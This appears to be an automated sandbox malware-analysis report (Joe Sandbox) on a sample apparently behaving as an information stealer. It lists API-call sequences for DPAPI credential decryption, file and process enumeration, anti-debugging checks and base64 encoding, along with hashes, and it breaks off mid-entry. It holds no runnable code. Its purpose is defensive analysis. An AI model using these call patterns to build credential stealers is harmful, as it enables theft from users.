                                      • API String ID: 1415058207-0
                                      • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                      • Instruction ID: 73a9364c24afd51a29fb2c5b36399241a525cd4f94928fcb7a40d0c7100667f9
                                      • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                      • Instruction Fuzzy Hash: 0512B971920318ABCF19EBA4DD95EFD737AAF64300F80419DA50B62198EF746B88DF50
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022DE0C5
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 022DE115
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 022DE12B
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE647
                                      • FindClose.KERNEL32(000000FF), ref: 022DE659
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2325840235-0
                                      • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction ID: 440464842bfea9bd3f8c3077bc53d2126ae183129c8bf3bfc03003d384b37090
                                      • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction Fuzzy Hash: D5F18E719243189ACF19EBA4DD95EEE733ABF64300F8051DEA04B62194EF346F89DE50
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                      • LocalFree.KERNEL32(00000000), ref: 00417D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
                                      • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                      • Opcode Fuzzy Hash: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
                                      • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                      APIs
                                      • memset.MSVCRT ref: 0040C853
                                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00690080), ref: 0040C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                      • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                      APIs
                                      • memset.MSVCRT ref: 022DCABA
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                      • memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                      • lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                      • lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                      • lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction ID: 7124607a6af9e312d62fabed20a90f864ab73880f9c43b6cd4e3b9e6036be3fd
                                      • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction Fuzzy Hash: 9441807895421AEFDB10DFE0DC88BFEBBB9BB44304F1045A9E509A6284D7749B84CF91
                                      APIs
                                      • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00690100,?,0042110C,?,00000000,?), ref: 0041696C
                                      • sscanf.NTDLL ref: 00416999
                                      • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00690100,?,0042110C), ref: 004169B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00690100,?,0042110C), ref: 004169C0
                                      • ExitProcess.KERNEL32 ref: 004169DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID: B
                                      • API String ID: 2533653975-2248957098
                                      • Opcode ID: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
                                      • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                      • Opcode Fuzzy Hash: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
                                      • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: N@
                                      • API String ID: 4291131564-4229412743
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022E7E48
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 022E7E60
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 022E7E74
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022E7EC9
                                      • LocalFree.KERNEL32(00000000), ref: 022E7F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID:
                                      • API String ID: 3090951853-0
                                      • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction ID: 7b36b7044187fc5517709c669f925f6071b0808c46861aa294c5174f1270752c
                                      • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction Fuzzy Hash: 2F414B71960218ABDF24DF94DC89BEDB3B5FB54700F5041D9E00AA6294DB742F85CFA1
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                      • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 022EBE09
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022EBE1E
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022EBE29
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 022EBE45
                                      • TerminateProcess.KERNEL32(00000000), ref: 022EBE4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 448d301f87af9d0852dfd6569630a4753f537efff7dbbb595473ce5d966f2ee6
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: 8F21A0BC910305DFDB14DF69F8896963BE4FB0A314F50403AE90A872A4EBB05985EF49
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 3657800372-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022D74B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022D74BB
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022D74E8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022D750B
                                      • LocalFree.KERNEL32(?), ref: 022D7515
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: 03cadf98fc03014be5a8b63e80c28f79453de4ce1e4a8b84e0aa660d07293381
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: FF010075A90208BBEB10DFD4DD45F9D77B9EB44704F108155FB05AA2C4D6B4AA00CB66
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                      • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022E9885
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 022E9899
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 022E98AE
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 022E98C3
                                      • CloseHandle.KERNEL32(00420ACA), ref: 022E98E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: bed392d1c59406249c2bfdd7b74981ed85f29ea5f5ccd7a468ab886350c018da
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: D201E979A60208FBDB20DFE4CD54BEDB7F9EF49700F404189A506A6254D7749A80DF51
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022DE709
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 022DE759
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 022DE76F
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DEE46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID:
                                      • API String ID: 433455689-0
                                      • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction ID: 07d7e41e9441e3eff96cbb0616cc400a0e0e92a08ac28931d7856870c11a89eb
                                      • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction Fuzzy Hash: B412DA71A203189BCF18FBA4DD95EFD737AAFA4300F8041ADA50B56198EE345B88DF51
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,022D53EB,40000001,00000000,00000000,?,022D53EB), ref: 022E9127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 622d2ef8113f0193da235df1660f906510042ef9c57664332be7fcb04a29c989
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: DF11DD74214205BFDF00CF94DC89FAA33AAAF89754F409559FD0A8F264D775E881EB60
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                      • LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: f1e0d2950fb66c37afa73a8a57ec2a713583f5a14ecf84620eb785c2c8bedc6a
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 8611A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FD159B394C776A941CB90
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                      • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                      • LocalFree.KERNEL32(?), ref: 00409BD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
